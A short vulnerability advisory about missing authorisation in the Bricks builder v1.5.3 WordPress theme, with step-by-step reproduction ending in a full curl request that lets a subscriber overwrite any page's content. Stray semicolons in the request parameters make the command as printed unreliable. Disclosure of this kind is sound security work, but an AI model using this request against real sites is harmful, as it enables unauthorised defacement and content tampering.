The theme does not have authorisation in an AJAX action, which could allow any authenticated users such as subscriber to call it and edit any page, post, or template on the blog
1. Start with a clean Wordpress install 2. Install Bricks builder v1.5.3 3. Enable registrations on the website 4. Register as a new user, log in, and copy the cookies 5. Find a valid postId (e.g. 2 - the ID of Sample Page created by default in new Wordpress installations) 6. Send the following request to the server curl ‘http://example.com/wp-admin/admin-ajax.php’ -X POST \ -H ‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8’ \ -H ‘Cookie: INSERT_COOKIES_HERE’ \ --data-raw ‘action=bricks_save_post&postId;=INSERT_POST_ID_HERE&area;=content&nonce;=0&content;=%5B%7B%22id%22%3A%22aijdog%22%2C%22name%22%3A%22text%2Dbasic%22%2C%22parent%22%3A0%2C%22children%22%3A%5B%5D%2C%22settings%22%3A%7B%22text%22%3A%22Pwned%22%7D%7D%5D’ 7. The contents of the page should be replaced with a paragraph reading “Pwned”